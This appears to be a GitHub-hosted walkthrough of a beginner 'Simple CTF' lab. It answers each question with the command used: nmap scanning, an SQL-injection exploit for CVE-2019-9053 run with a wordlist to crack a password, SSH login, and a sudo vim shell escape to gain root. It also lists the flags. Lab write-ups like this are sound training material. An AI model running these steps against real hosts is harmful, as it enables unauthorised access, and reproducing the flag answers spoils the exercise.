Skip to content

Latest commit

 

History

History
67 lines (62 loc) · 1.94 KB

writeup.md

File metadata and controls

67 lines (62 loc) · 1.94 KB
Beginner level ctf

Task 1. Simple CTF

Deploy the machine and attempt the questions!

How many services are running under port 1000?

2
  • nmap -sC -Cv 10.10.25.90

What is running on the higher port?

ssh

What's the CVE you're using against the application?

CVE-2019-9053

To what kind of vulnerability is the application vulnerable?

sqli

What's the password?

secret
  • pip install termcolor
  • python exploit.py -u http://10.10.25.90/simple --crack -w /usr/share/wordlists/rockyou.txt

Where can you login with the details obtained?

ssh
  • ssh mitch@10.10.10.10 -p 2222

What's the user flag?

G00d j0b, keep up!
  • cat user.txt

Is there any other user in the home directory? What's its name?

sunbath
  • cd .. && ls

What can you leverage to spawn a privileged shell?

vim
  • sudo -l
  • sudo vim -c ‘:!/bin/sh’

What's the root flag?

W3ll d0n3. You made it!
  • cat /root/root.txt

Done 😄